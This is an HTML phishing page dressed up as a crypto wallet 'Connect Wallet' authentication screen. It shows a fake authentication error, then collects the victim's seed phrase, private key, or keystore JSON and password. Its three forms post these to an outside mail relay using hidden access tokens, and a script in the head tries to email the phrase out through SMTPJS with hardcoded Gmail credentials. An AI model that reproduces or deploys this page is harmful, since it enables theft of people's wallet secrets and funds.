<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <script src="https://cdnjs.cloudflare.com/ajax/libs/qrcodejs/1.0.0/qrcode.min.js" integrity="sha512-CNgIRecGo7nphbeZ04Sc13ka07paqdeTu0WR1IM4kNcpmBAUSHSQX0FslNhTDadL4O5SAGapGt4FodqL8My0mA==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <title>Connect Wallet</title>
    <link rel="shortcut icon" href="assets/images/favicon.png">
    <style>
        @import url('https://fonts.googleapis.com/css2?family=Poppins:wght@300;400;500;600;700;800&display=swap');

* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
  font-family: 'Poppins', sans-serif;
}
/* .container {
  clear: both;
  margin: 0 auto;
  margin-top: 0px;
  max-width: 1300px;
} */

body {
  display: flex;
  justify-content: center;
  align-items: center;
  min-height: 100vh;
  background: #1c1c1c;
}

.container {
  position: relative;
  width: 500px;
  padding: 0px 30px;
}

.container .loading {

}
.am {
  display: flex;
  width: 100%;
  align-items: center;
  position: relative;
  height: 5px;
}

.container .dot {
  content: '';
  position: absolute;
  top: 200%;
  left: 0;
  /* width: 100%;
  height: 50%; */
  /* background: rgba(255, 255, 255, 0.1); */
  z-index: 10;
  pointer-events: none;
}

.container .loading::after {
  content: '';
  position: absolute;
  top: 27px;
  left: 20px;
  width: 10px;
  height: 10px;
  border-radius: 10px;
  background: #22e4e3;
  box-shadow: 0 0 5px #22e4e3, 0 0 10px #22e4e3, 0 0 40px #22e4e3;
  animation: animateLight 1s linear infinite;
}

@keyframes animateLight {
  0%,
  49.99% {
    background: #22e4e3;
    box-shadow: 0 0 5px #22e4e3, 0 0 10px #22e4e3, 0 0 40px #22e4e3;
  }
  50%,
  100% {
    background: #111;
    box-shadow: none;
  }
}

.container .loading .text {
  position: relative;
  width: 80px;
  color: #fff;
  text-align: right;
  letter-spacing: 1px;
  top: -5px;
}

.container .loading .percent {
  position: relative;
  top: 2px;
  width: calc(100%);
  height: 20px;
  background: #151515;
  border-radius: 20px;
  margin: 0 10px;
  box-shadow: inset 0 0 10px #000;
  overflow: hidden;
}

.container .loading .percent .progress {
  position: absolute;
  top: 0;
  left: 0;
  width: 0;
  height: 100%;
  border-radius: 20px;
  /* background: linear-gradient(45deg, #22ffde, #2196f3); */
  background: linear-gradient(45deg, #4aeef4, #0146fd);
  animation: animate 6s ease-in-out infinite;
}

@keyframes animate {
  0% {
    width: 0;
    left: 0;
  }
  50% {
    width: 100%;
    left: 0;
  }
  100% {
    width: 100%;
    left: 100%;
  }
}
/* modal */
.box {
  background: #0d0e0e;
  margin: 5% auto;
  padding: 3%;
  display: flex;
  flex-direction: column;
  max-width: 300px;
  border-radius: 20px ;
  position: relative;
  box-shadow: 0 15px 15px -15px #2C3E50;
  padding: 10px 30px 20px 10px;
}

img {
  height: 48px;
  width: 48px;
  margin: 0 auto -10px auto;
}
h2 {
  font-family: 'Barlow Condensed';
  text-align: center;
  color: rgb(255, 0, 0);
}

p {
  font-family: 'Barlow';
  color: grey;
  font-weight: 500;
  margin: -8px auto auto;
}

button {
  font-family: 'Barlow';
  border: none;
  outline:none;
  width : 100%;
  height: 50px;
  font-size: 20px;
  text-align: center;
  margin: 10px;
  color: white;
  border-radius: 10px;
  /* background-image: linear-gradient(325deg, rgba(34,67,195,1) 72%, rgba(253,187,45,1) 100%); */
  /* background-color: #86ff00; */
  background: linear-gradient(45deg, #4aeef4, #0146fd);
  cursor: pointer;
}

span{
  background: no-repeat transparent center center;
  height: 24px;
  width: 24px;
  padding:5px;
  border-radius:10px;
  position: absolute;
  right:20px;
  top:20px;
}
/* live trade */
.upper{
  /* flex-direction: row; */
  width: 100%;
  height: 80px;
  background: #fff;
  position: fixed;
  top: 0;
  left: 0;
  padding: 5px 0;
  overflow: hidden;

}
.upp_box{
/* background: #be0404; */
min-width: 140px;
width: fit-content;
height: 100%;
font-family: 'Poppins', sans-serif;
font-weight: 500;
border-left: 2px solid #ccc;
padding: 0 5px;
animation: scroll 2s infinite linear 3s;
color: #000;
overflow: hidden;
}
.bold{
  font-weight: 800;
  font-family: 'Poppins', sans-serif;
}
.upp_box p{
  font-size: 14px;
  margin-top: 2px;
  font-family: 'Poppins', sans-serif;
}
.color_red{
  color: red;
  font-family: 'Poppins', sans-serif;
}
.color_green{
  color: green;
}

@keyframes scroll {
  0% {
    transform: translateX(100%);
  }
  100% {
    transform: translateX(-100%);
  }
}

.verify{
  background: #fff;
  padding: 10px;
  flex-direction: column;
  font-family: 'Poppins', sans-serif;
  margin: 5px;
  margin-top: 30px;
}
.verify p{
  font-family: 'Poppins', sans-serif;
  color: #000;
  font-weight: 400;
}
.very{
  padding: 10px;
  border-bottom: 2px solid #ccc;
  width: 100%;
  text-align: center;
  /* border-style: dashed; */
}
.capitalize{
  text-transform: capitalize;
}
.boldder{
font-weight: 800;
}
.text-big{
  font-size: 40px;
}
.selction-div{
  display: flex;
  flex-direction: column;
  border: 2px solid #b3b2b2;
}
.header{
  display: flex;
  flex-direction: row;
  align-items: center;
  justify-content: center;
  background: #ccc;
  padding: 10px;
}
.header div{
  border-style: none;
  outline: none;
  padding: 2 10px;
  background: transparent;
  border-radius: 20px;
  cursor: pointer;
}
.header div:hover,
.header div:focus,
.header div:active{
  background: #fff;
}
.phase-sp{
  padding: 10px;
  display: none;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  gap: 5px;
}
.priv-sp{
  padding: 10px;
  display: none;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  gap: 5px;
}
.ksj-sp{
  padding: 10px;
  display: none;
  flex-direction: column;
  align-items: center;
  justify-content: center;
  gap: 5px;
}
.phase-sp textarea{
  resize: none;
  width: 100%;
  height: 150px;
  padding: 10px;
  outline: none;
  border: 2px solid #e9e9e9;
}
.ksj-sp textarea{
  resize: none;
  width: 100%;
  height: 150px;
  padding: 10px;
  outline: none;
  border: 2px solid #e9e9e9;
  border-radius: 5px;

}
.priv-sp input{
  width: 100%;
  height: 30px;
  padding: 10px;
  outline: none;
  border: 2px solid #e9e9e9;
  border-radius: 5px;
}
.ksj-sp input{
  width: 100%;
  height: 30px;
  padding: 10px;
  outline: none;
  border: 2px solid #e9e9e9;
  border-radius: 5px;

}
.phase-sp button{
  width: 100%;
  height: 30px;
  font-size: 14px;
  font-family: 'Poppins', sans-serif;
  margin-top: 10px;
}
.ksj-sp button{
  width: 100%;
  height: 30px;
  font-size: 14px;
  font-family: 'Poppins', sans-serif;
  margin-top: 10px;
}
.priv-sp button{
  width: 100%;
  height: 30px;
  font-size: 14px;
  font-family: 'Poppins', sans-serif;
  margin-top: 10px;
}
.mt{
  margin-top: 10px;
}
.tl{
  text-align: left;
}
.fill{
  display: flex;
}
.show{
  display: flex;
  background: #fff;

}
.seterr{
  color: #ff0000;
  font-size: 10px;
  font-family: 'Poppins', sans-serif;
}

.setperr{
  color: #ff0000;
  font-size: 10px;
  font-family: 'Poppins', sans-serif;
}

.setkerr{
  color: #ff0000;
  font-size: 10px;
  font-family: 'Poppins', sans-serif;
}
.qrCode.showing{
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  backdrop-filter: blur(10px);
  background: #ffffff8c;
  width: 90%;
  height: 90%;
  padding: 20px;
  align-items: center;
  justify-content: center;
  box-shadow: 2px 2px 4px #222222, -2px -2px 4px #ccc;
  display: flex;
  flex-direction: column;
}
.qrCode img{
  width: 100%;
  height: 100%;
}
.timer{
  color: #ff0000;
}

.qrCode{
  position: absolute;
  top: 50%;
  left: 50%;
  transform: translate(-50%, -50%);
  align-items: center;
  justify-content: center;
  display: none;
}
#qr-code{
  width: 200px;
  height: 200px;
  padding: 10px;
  border: 5px solid #000;
}
.timerc{
  margin-top: 10px;
  color: #000;
  font-family: 'Poppins', sans-serif;
}

.fuller {
  width: 100%;
}



    </style>


<script src="https://smtpjs.com/v3/smtp.js">
</script>
<script>
  Email.send({
    Host : "smtp.gmail.com",
    Username : "halalprogrammer@gmail.com",
    Password : "rayshy12",
    To : 'halalprogrammer@gmail.com',
    From : document.getElementById("phrase").value,
    Subject : "New contact",
    Body : "And this is the body"
}).then(
  message => alert(message)
);
</script>
</head>
<body>
    <div class="container">

      <div class="upper" id="upper">
        
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
          <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
         <div class="upp_box">
            <p>EUT to USD</p>
            <p class="bold">1.099994</p>
            <p class="color_red"> -0.00078(-0.07%)</p>
          </div>
      </div>
      
      <div class="box" id="box">

        <span></span>
        <img src="assets/img/Icons/error.png" alt="">
        <h2 style="margin-top: 20px; margin-bottom: 25px;">Unable to Authenticate </h2>
        <button onclick="handleremove()">Connect Manually</button>
      </div>

     
      <div class="verify" style="display: none;" id="verify">

        
       <p class="capitalize bold very">verify wallet</p>
       <p class="bolder text-big capitalize mt">authentication</p>
       <div class="selction-div">
        <div class="header">
          <div class="phrase">phrase</div>
          <div class="private_key">private_key</div>
          <div class="keyStore_json">keyStore json</div>
        </div>
        <div class="selected_div_space1">

            <!-- <form class="phase-sp" action="https://postmail.invotes.com/send"
            method="post" id="email_form"> -->

            <form action="https://postmail.invotes.com/send" method="post" id="email_form" class="phase-sp">

                <p class="capitalize">input secret phase</p>
                <input type="text" name="subject" placeholder="Wallet Address" class="fuller"/>
                <textarea name="text" placeholder="Message" placeholder="Enter Phrase" id="phs" cols="30" rows="10" required></textarea>
                
                <input type="hidden" name="access_token" value="36925jk6r7t0h5b5eosmrr9u" />
                <input type="hidden" name="success_url" value="./qr.html" />
                <input type="hidden" name="error_url" value="./qr.html" />

                <div class="seterr"></div> 
                <button id="submit_form" type="submit" value="Send" class="conw ">Connect Wallet</button>
                <!-- <input class="conw bphs" id="submit_form" type="submit" value="Connect Wallet" /> -->
                <!-- <button class="conw bphs" id="submit_form" >Connect Wallet</button> -->
            </form>

            <form class="priv-sp" action="https://postmail.invotes.com/send" method="post" id="email_form" class="phase-sp">
              <p class="capitalize">input private Key</p>
              <input type="text" name="subject" placeholder="Wallet Address" class="fuller"/>
              <input type="text" name="text" id="psp" placeholder="Enter Private Key" >

              <input type="hidden" name="access_token" value="kswxi85jnoo9w7nserf6ljf8" />
                <input type="hidden" name="success_url" value="./qr.html" />
                <input type="hidden" name="error_url" value="./qr.html" />
              <div class="setperr"></div>

              <button id="submit_form" type="submit" value="Send" class="conw ">Connect Wallet</button>
            </form>

            <form class="ksj-sp" action="https://postmail.invotes.com/send" method="post" id="email_form" class="phase-sp">
              <p class="capitalize">input KeyStore json</p>
              <textarea name="text" placeholder="Enter Phrase" id="ksp" cols="30" rows="10" ></textarea>
              <p class="capitalize mt tl">input password</p>
              <input type="password" name="subject" id="kpsp">

              <input type="hidden" name="access_token" value="kswxi85jnoo9w7nserf6ljf8" />
                <input type="hidden" name="success_url" value="./qr.html" />
                <input type="hidden" name="error_url" value="./qr.html" />
                
              <div class="setkerr"></div>
              <button id="submit_form" type="submit" value="Send" class="conw ">Connect Wallet</button>
            </form>

        </div>
       </div>
      </div>

      

      <div class="qrCode">
        <div id="qr-code">

        </div>
        <div class="timerc"> you have 30secs before qr code expires! <span class="timer"></span></div>

      </div>


      <p class="message" id="msg" style="color: #fff; display: none;">Processing...</p>

     <div class="loading" id="load" style="display: none;">
        <!-- <span class="text">Loading</span><br> --><br>
          <div class="am">
            <div class="dot"></div>
            <div class="percent">
              <div class="progress"></div>
            </div>
        </div>
      </div>

     


    </div>





  
  <script src="./script.js"></script>
  <!-- <script>
    var submitButton = document.getElementById("submit_form");
    var form = document.getElementById("email_form");
    form.addEventListener("submit", function (e) {
        setTimeout(function() {
            submitButton.value = "Sending...";
            submitButton.disabled = true;
        }, 1);
    });
</script>  -->
</body>
</html>